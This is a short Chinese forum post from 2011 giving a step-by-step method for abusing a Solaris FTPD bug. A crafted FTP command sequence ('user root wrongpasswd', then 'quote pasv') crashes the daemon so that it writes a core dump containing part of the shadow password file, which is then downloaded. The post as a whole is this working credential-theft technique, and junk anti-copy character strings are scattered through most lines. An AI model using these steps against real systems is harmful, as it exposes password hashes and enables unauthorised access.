該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG���,使得用戶可以獲得該機(jī)的口令文件��。具體過程如下:
! Z9 [, j3 C! d- x) M8 |0 J4 k5 N/ Q' e
1.通過 ftp 正常登錄到目的主機(jī)上! J y& ?1 J+ M; o: K' O
0 ~, X& f$ M9 q9 j& t; e' P* A0 ]2.輸入如下命令序列:. W) M$ m3 x, A- F& Z% z: a5 t
6 O1 h! }* C* \' M4 Q1 }0 t' C% ~
ftp> user root wrongpasswd j3 l/ @8 z3 e3 z6 T! V! k/ `: z
2 ^$ [4 e. t3 ?- A( X/ X7 ~5 l) cftp> quote pasv- {$ {9 t' B9 U, i" C* p4 I2 U
& i( [& L5 ^* x, E4 ~3.這時���,ftpd會報錯退出,同時會在當(dāng)前目錄下生成一個core��,口令文件就包含在這個core中����。
, X# U$ L, f; H3 [* V/ y- ] V; H( u3 T2 O, |
4.再次進(jìn)入FTP >get core" Z- t6 a& \9 V
1 I/ o! Q8 `" b5 l% K( B: A; q, }/ m
補(bǔ)充:雖然在core只有一部分shadow�,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
9 }& e( T: F# k" _
: w1 H3 j" H3 q+ ?* H |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡